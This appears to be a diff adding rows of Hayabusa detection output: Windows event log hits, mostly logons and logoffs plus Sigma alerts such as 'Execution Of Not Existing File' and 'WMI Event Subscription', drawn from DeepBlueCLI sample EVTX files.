+2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x27008  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x27038  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x27008,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 07:40:33.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x27038,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:50:56.046 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:51:29.601 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x12048  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x12070  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x131c3  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x13216  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IEUser  :  Target User: rdavis  :  IP Address: -  :  Process:   :  Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x36aed  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE9WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x36b1d  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:15:39.306 +09:00,IE9Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x11c02  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x11c32  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x170f5  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x17125  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1ac86  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1b245  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1a23a  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1a265  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1e056  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x1e3c9  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser  :  LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x6831f  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE10WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x6832b  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
